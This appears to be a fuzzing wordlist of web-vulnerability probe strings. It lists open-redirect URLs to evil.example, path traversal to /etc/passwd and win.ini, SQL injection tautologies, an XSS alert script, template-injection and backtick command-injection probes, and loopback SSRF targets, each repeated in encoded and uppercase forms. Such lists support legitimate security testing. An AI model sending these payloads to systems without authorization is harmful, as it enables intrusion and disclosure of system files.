https://evil.example
//evil.example
///evil.example
https://evil.example/%2f..
https://evil.example@trusted.com
//evil.example/%2e%2e
test
baseline
AUROSE_PROBE
../../../../etc/passwd
..\..\..\..\windows\win.ini
' OR '1'='1
" OR "1"="1
<script>alert(1)</script>
${7*7}
{{7*7}}
`id`
127.0.0.1
http://127.0.0.1
https://example.com
https%3A%2F%2Fevil.example
%2F%2Fevil.example
%2F%2F%2Fevil.example
https%3A%2F%2Fevil.example%2F%252f..
https%3A%2F%2Fevil.example%40trusted.com
%2F%2Fevil.example%2F%252e%252e
..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%5C..%5C..%5C..%5Cwindows%5Cwin.ini
%27%20OR%20%271%27%3D%271
%22%20OR%20%221%22%3D%221
%3Cscript%3Ealert%281%29%3C%2Fscript%3E
%24%7B7%2A7%7D
%7B%7B7%2A7%7D%7D
%60id%60
http%3A%2F%2F127.0.0.1
https%3A%2F%2Fexample.com
HTTPS://EVIL.EXAMPLE
//EVIL.EXAMPLE
///EVIL.EXAMPLE
HTTPS://EVIL.EXAMPLE/%2F..
HTTPS://EVIL.EXAMPLE@TRUSTED.COM
//EVIL.EXAMPLE/%2E%2E
TEST
BASELINE
../../../../ETC/PASSWD
..\..\..\..\WINDOWS\WIN.INI
<SCRIPT>ALERT(1)</SCRIPT>
`ID`
HTTP://127.0.0.1
HTTPS://EXAMPLE.COM
HTTPS%3A%2F%2FEVIL.EXAMPLE
%2F%2FEVIL.EXAMPLE
%2F%2F%2FEVIL.EXAMPLE
HTTPS%3A%2F%2FEVIL.EXAMPLE%2F%252F..
HTTPS%3A%2F%2FEVIL.EXAMPLE%40TRUSTED.COM
%2F%2FEVIL.EXAMPLE%2F%252E%252E
..%2F..%2F..%2F..%2FETC%2FPASSWD
..%5C..%5C..%5C..%5CWINDOWS%5CWIN.INI
%3CSCRIPT%3EALERT%281%29%3C%2FSCRIPT%3E
%60ID%60
HTTP%3A%2F%2F127.0.0.1
HTTPS%3A%2F%2FEXAMPLE.COM
' OR '1'%3D'1
" OR "1"%3D"1
https://evil.example?v=0
https://evil.example&v=0
https%3A%2F%2Fevil.example_0
openredirect_0
/openredirect/0
https://evil.example%0a0
//evil.example?v=1
//evil.example&v=1
%2F%2Fevil.example_1
openredirect_1
/openredirect/1
//evil.example%0a1
///evil.example?v=2
///evil.example&v=2
%2F%2F%2Fevil.example_2
openredirect_2
